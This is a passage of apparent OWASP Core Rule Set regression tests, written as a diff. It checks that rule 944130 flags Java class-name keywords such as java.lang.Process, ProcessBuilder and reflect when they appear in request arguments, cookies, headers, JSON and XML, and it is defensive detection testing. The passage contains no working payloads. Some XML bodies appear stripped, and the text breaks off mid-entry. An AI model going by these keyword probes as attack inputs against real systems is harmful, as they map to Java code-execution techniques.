headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_title: 944130-284 + desc: "Content-Type text/plain includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_title: 944130-285 + desc: "Content-Type application/json arg value includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Integer\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-286 + desc: "Content-Type application/json arg name includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Integer\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-287 + desc: "Argument test includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_title: 944130-288 + desc: "Argument name includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Number=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-289 + desc: "Cookie test includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Number + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-290 + desc: "Cookie name includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Number=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-291 + desc: "Request header test includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Number + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-292 + desc: "XML attribute value includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-293 + desc: "XML element value includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_title: 944130-294 + desc: "Nested XML element value includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_title: 944130-295 + desc: "Content-Type text/plain includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_title: 944130-296 + desc: "Content-Type application/json arg value includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Number\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-297 + desc: "Content-Type application/json arg name includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Number\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-298 + desc: "Argument test includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_title: 944130-299 + desc: "Argument name includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Object=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-300 + desc: "Cookie test includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Object + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-301 + desc: "Cookie name includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Object=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-302 + desc: "Request header test includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Object + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-303 + desc: "XML attribute value includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-304 + desc: "XML element value includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_title: 944130-305 + desc: "Nested XML element value includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_title: 944130-306 + desc: "Content-Type text/plain includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_title: 944130-307 + desc: "Content-Type application/json arg value includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Object\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-308 + desc: "Content-Type application/json arg name includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Object\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-309 + desc: "Argument test includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_title: 944130-310 + desc: "Argument name includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Process=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-311 + desc: "Cookie test includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Process + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-312 + desc: "Cookie name includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Process=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-313 + desc: "Request header test includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Process + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-314 + desc: "XML attribute value includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-315 + desc: "XML element value includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_title: 944130-316 + desc: "Nested XML element value includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_title: 944130-317 + desc: "Content-Type text/plain includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_title: 944130-318 + desc: "Content-Type application/json arg value includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Process\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-319 + desc: "Content-Type application/json arg name includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Process\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-320 + desc: "Argument test includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-321 + desc: "Argument name includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-322 + desc: "Cookie test includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.ProcessBuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-323 + desc: "Cookie name includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.ProcessBuilder=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-324 + desc: "Request header test includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.ProcessBuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-325 + desc: "XML attribute value includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-326 + desc: "XML element value includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-327 + desc: "Nested XML element value includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-328 + desc: "Content-Type text/plain includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-329 + desc: "Content-Type application/json arg value includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.ProcessBuilder\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-330 + desc: "Content-Type application/json arg name includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.ProcessBuilder\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-331 + desc: "Argument test includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.reflect" + output: + log_contains: "id \"944130\"" + - test_title: 944130-332 + desc: "Argument name includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.reflect=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-333 + desc: "Cookie test includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.reflect + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-334 + desc: "Cookie name includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.reflect=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-335 + desc: "Request header test includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.reflect + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-336 + desc: "XML attribute value includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-337 + desc: "XML element value includes keyword java.lang.reflect" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 